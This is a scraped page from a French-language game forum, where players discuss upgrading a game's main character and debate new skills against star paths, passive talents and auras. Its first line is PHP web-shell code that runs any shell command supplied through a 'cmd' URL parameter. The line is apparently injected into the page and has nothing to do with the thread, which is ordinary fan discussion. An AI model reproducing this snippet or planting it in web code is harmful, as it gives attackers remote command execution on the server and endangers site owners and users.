ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

GGCORP Forums

Mot de passe oublie
 Inscri. Rapide
Recherche
Auteur: adwendril

Mettre le main a niveau [Copier l'URL]

Rank: 6Rank: 6

Heure de publication 2016-10-2 20:42:37 |Afficher toutes les publications
Moi je veut des nouveau skill au perso

Utiliser la magie Signaler

Heure de publication 2016-10-4 14:50:28 |Afficher toutes les publications
Merci natchoum ^^ et selyan des nouveaux skill serai bien mais des etoiles mieu je pense, car pour pouvoir use les nouveaux skill faudrai que le main puissent attaquer deja ^^

Heure de publication 2016-10-4 18:27:08 |Afficher toutes les publications
adwendril a repondu a 2016-10-4 14:50
Merci natchoum ^^ et selyan des nouveaux skill serai bien mais des etoiles mieu je pense, car pour p ...

pas faut xD

Heure de publication 2016-10-7 19:32:34 |Afficher toutes les publications
Qu'en pense les cm? est ce une bonne idée que nous avons eu?

Heure de publication 2016-10-7 23:39:48 |Afficher toutes les publications
Oui surtout des nouveau skill je lâche rien mdrr

Heure de publication 2016-10-8 09:39:06 |Afficher toutes les publications
selyan123 a repondu a 2016-10-7 23:39
Oui surtout des nouveau skill  je lâche rien mdrr

... j'abandonne

Heure de publication 2016-10-8 10:11:02 |Afficher toutes les publications
adwendril a repondu a 2016-10-8 09:39
... j'abandonne

Mdrrrr moi je veut vraiment de nouveau skill !

Heure de publication 2016-10-8 11:59:55 |Afficher toutes les publications
Sauf que je cherche a te dire que de nouveaux skill serai pour le moment inutile! ton main meur des la 1er attaque pour que les skill sois utile faudrai ton mettre sur le main ce qui veux dire qu un autre perso deviendrai inutile.. Or les nvx skill pourrai ne pas etre utile et tu pedrai des ressources a avoir monter un truc inutile.. alors que des etoiles surtout si c'est des etoile react comme effet en recevant une attaque ou a la mort serai tres rentable sans tout reinvestir sur le main
Du coup ton argument sans argumentation je le trouve dommage =/ sa fais un enfant qui veux un velo a tout pris alors qu il n as aucun equilibre et refuse un tricycle qui lui permettrai de faire ce qu il veux en mieu ^^ Alors stp argumente, que je comprenne ton point de vue, car la tu es plus agacant qu autre chose quand nous on veux faire evoluer le jeu pour du benifique pour tous meme vip 0 voir mon autre message plus haut dans la converse...

Heure de publication 2016-10-8 13:15:56 |Afficher toutes les publications
adwendril a repondu a 2016-10-8 11:59
Sauf que je cherche a te dire que de nouveaux skill serai pour le moment inutile! ton main meur des  ...

Oui tu as raison s'avais pas pensé dans se sens ...

Heure de publication 2016-10-8 16:17:52 |Afficher toutes les publications
J'avais pensé aux chemins d'étoiles, mais aussi (pourquoi pas hein ^^) à un contenu PVE Supplémentaire où l'on pourrait en finissant certaines instances débloquer certains "talents passifs", "auras", et même "technique après la mort" toutes propres uniquement au main et qui permettrait qu'il entre plus dans la stratégie PVP.  

Bien sur, on aura pas des : "aura : Augmente la vitesse des alliés de 10%" , mais pourquoi pas une Aura/Talent passif qui l'empêche d'être controlé, ou qui lui permet de Lacérer à taux de 5/10 % avec une certaine probabilité (en plus des effets de skill) etc...

La "Tecnhique après la Mort" serait très utile dans le cas de Main faibles ou peu développé.

Car actuellement, les matches sont pas vraiment 5 vs 5 mais 4 vs 4 clairement...

Concernant les étoiles, je pensais vraiment à plusieurs chemins dans le style suivant :

--> Une premier partie comprenant 4 Etoiles qui seront 3 chemins possibles :
- 4 Etoiles de type Off (exemple : total = +X% Atk, +Y% Dégats, +Z% Vitesse, + T% Critique)
- 4 Etoiles de type Def (exemple : total = +X% PV, +Y% Immun, +Z%Def, +T% Aide)
- 4 Etoiles de type Mixte (exemple : total = +Y'% Dégats, +Y'% Immun, +Z'% Vitesse, +Z'% Def) avec Y'<Y et Z'<Z (ex : Y=Z=10, Y'=Z'=5)

--> Une deuxième partie comprenant 3 Etoiles à choisir avec 1 par Catégorie:
- Immunisé à l'Invulnérabilité, Boucliers... -> 1 Etoile contre des Buffs ennemis sur les Ennemis
- Immunisé au Chaos, Restriction de furie, Vide, Controle, Silence etc... -> 1 Etoile contre des Débuffs ennemis sur l'état du Main
- Immunisé à la Réduction de Furie, Lacération, Poison... -> 1 Etoile contre des Débuffs ennemis sur la Vie ou sa Furie propre.

Voilà c'était mon idée de base que j'avais pas voulu développer en attendant de voir les réactions ^^

Désolé du long post et si c'est pas très comprehensible au niveau des pourcentages, j'essaierai de le refaire mieux si je peux

Vous devez vous identifier avant de pouvoir repondre Identifiant | Inscri. Rapide

GGCORP|MyNinja|MyBankai|MyPirate|MyLegend|Archiver|GGCORP Inc.

GMT+2, 2020-1-25 00:29 , Processed in 0.026533 second(s), 9 queries , Xcache On.